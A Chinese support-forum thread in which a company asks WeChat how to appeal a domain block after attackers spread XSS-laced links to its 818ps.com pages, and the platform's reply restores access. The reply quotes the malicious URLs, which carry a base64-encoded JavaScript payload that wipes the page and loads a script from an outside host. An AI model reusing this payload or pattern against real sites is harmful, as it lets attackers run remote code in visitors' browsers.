问题:我司网页内容分享到微信,打开提示安全漏洞,经过我司安全部排查,证实有人在ch5.818ps.com与m.818ps.com正常链接后加XSS攻击代码,并恶意传播到微信,程序不会执行该代码,链接是他人冒用我们身份通过非官方渠道发布,站内已做落地页封锁返回数据异常提醒,但域名还是被封禁,需要怎么处理??谢谢!!
具体注入xss案例链接,因社区发帖限制,不能发出,请看截图!
网站备案号::沪ICP备17020445号-1
对于异常链接进行了过滤处理,返回数据异常。请问怎么申诉还是不通过呢?需要怎么解决?
你好,经核实域名818ps.com下的链接【https://download.818ps.com/activity/double-denier-new?origin=bottom_act20201107%22-new%20Function(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LmhpZGRlbj0iMSI7IGRvY3VtZW50LmRvY3VtZW50RWxlbWVudC5pbm5lckhUTUwgPSBudWxsOyB3aW5kb3cuc3RvcCgpOyB2YXIgc3MgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTsgc3Muc3JjID0gIi8vcXdlMTIzMzIxLm9zcy1jbi1iZWlqaW5nLmFsaXl1bmNzLmNvbS9qcy90Z3NfMS5qcyI7IGRvY3VtZW50LmRvY3VtZW50RWxlbWVudC5hcHBlbmRDaGlsZChzcyk7%27))()-%22&HaJ2FEN9_pjxgs=8PjNscdxw6TnJv4M23A、https://m.818ps.com/activity/double-denier-new?origin=bottom_act20201107%22-new%20Function(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LmhpZGRlbj0iMSI7IGRvY3VtZW50LmRvY3VtZW50RWxlbWVudC5pbm5lckhUTUwgPSBudWxsOyB3aW5kb3cuc3RvcCgpOyB2YXIgc3MgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTsgc3Muc3JjID0gIi8vcXdlMTIzMzIxLm9zcy1jbi1iZWlqaW5nLmFsaXl1bmNzLmNvbS9qcy90Z3NfMi5qcyI7IGRvY3VtZW50LmRvY3VtZW50RWxlbWVudC5hcHBlbmRDaGlsZChzcyk7%27))()-%22&HaJ2FEN9_pjxgs=8PjNscdxw6TnJv4M23A】的内容违反《微信外部链接内容管理规范》,违规内容已经修改,现已恢复微信内直接访问的服务,另核实该域名存在安全漏洞,建议修复相关漏洞,避免再次违规,请知悉。
具体违规情节:违反了《微信外部链接内容管理规范》第19条,详细规则请参考《微信外部链接内容管理规范》http://weixin.qq.com/cgi-bin/readtemplate?t=weixin_external_links_content_management_specification